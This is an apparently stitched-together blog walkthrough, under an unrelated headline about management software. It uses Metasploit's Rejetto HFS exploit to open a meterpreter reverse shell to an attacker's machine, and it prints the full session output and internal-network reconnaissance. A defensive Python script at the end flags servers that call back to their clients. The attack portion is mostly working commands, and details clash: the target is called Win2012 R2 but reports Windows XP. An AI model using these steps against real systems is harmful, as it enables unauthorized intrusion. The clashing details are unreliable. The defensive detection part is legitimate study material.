Multi-platform unified management software interface: how to implement a multi-platform unified management software interface
2022-10-24
Metasploit in Practice, Part 3: Using Metasploit to Gain Control of the Target
Attacker: Kali 192.168.175.128
Target: Win2012 R2 192.168.175.130

We have identified the target system's vulnerability and the Metasploit module that can exploit it. Next, we actually gain control of the target.

```
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOST 192.168.175.130
set RPORT 8080
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.175.128
exploit
```

The full session looks like this:

```
msf5 > use exploit/windows/
msf5 exploit(windows/> set RHOST 192.168.175.130
RHOST => 192.168.175.130
msf5 exploit(windows/> set RPORT 8080
RPORT => 8080
msf5 exploit(windows/> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/> set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/> show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.175.130  yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.175.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/> exploit

[*] Started reverse TCP handler on 192.168.175.128:4444
[*] Using URL: http://0.0.0.0:8080/OHqKAjyg9dj9u
[*] Local IP: http://192.168.175.128:8080/OHqKAjyg9dj9u
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /OHqKAjyg9dj9u
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1091) at 2019-01-23 11:32:15 +0800
[!] Tried to delete %TEMP%\OmpsEelxzVs.vbs, unknown result
[*] Server stopped.

meterpreter >
```

Once the exploit completes, we have control of the target host.

Next, let's check whether there are other hosts on the internal network:

```
meterpreter > sysinfo
Computer        : LIUYAZHUANG
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
meterpreter > arp

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    192.168.175.2    00:50:56:e7:f5:30  2
    192.168.175.128  00:0c:29:68:65:5b  2
    192.168.175.131  00:0c:29:cf:f6:ac  2

meterpreter >
```

We can see that there is another host on the internal network at 192.168.175.131.
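From the defender's side, the session above leaves a recognisable network pattern: right after 192.168.175.128 sends a request to the HFS port, the server itself opens connections back to that host (first to port 8080 to fetch the payload, then to 4444 for the reverse TCP session). The following Python script is an added example, not part of the original article, that flags this "server calls back to its client" pattern; the flow-record format, the 30-second window, and the sample lines are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed flow records (time, src, sport, dst, dport), modelled on the
# addresses and ports in the session above; the format itself is an assumption.
SAMPLE_FLOWS = """\
2019-01-23T11:30:02 192.168.175.2 51515 192.168.175.130 8080
2019-01-23T11:32:13 192.168.175.128 40112 192.168.175.130 8080
2019-01-23T11:32:14 192.168.175.130 1090 192.168.175.128 8080
this line is malformed and must be skipped
2019-01-23T11:32:15 192.168.175.130 1091 192.168.175.128 4444
2019-01-23T11:40:00 192.168.175.130 1100 192.168.175.131 445
"""

def parse_flows(text):
    """Parse whitespace-separated flow lines into dicts, skipping malformed ones."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
            sport, dport = int(parts[2]), int(parts[4])
        except ValueError:
            continue
        flows.append({"ts": ts, "src": parts[1], "sport": sport,
                      "dst": parts[3], "dport": dport})
    return sorted(flows, key=lambda f: f["ts"])

def find_callbacks(flows, server, service_port, window_s=30):
    """Return outbound flows from `server` to a host that sent a request to
    server:service_port no more than `window_s` seconds earlier."""
    window = timedelta(seconds=window_s)
    last_request = {}  # client IP -> time of its latest inbound request
    hits = []
    for f in flows:
        if f["dst"] == server and f["dport"] == service_port:
            last_request[f["src"]] = f["ts"]
        elif f["src"] == server and f["dst"] in last_request:
            if f["ts"] - last_request[f["dst"]] <= window:
                hits.append((f["dst"], f["dport"], f["ts"].isoformat()))
    return hits

if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for client, port, ts in find_callbacks(flows, "192.168.175.130", 8080):
        print(f"{ts} server called back to {client}:{port}")
```

A file server normally only answers inbound requests, so any hit from this check deserves a look even when the destination port is not the default 4444.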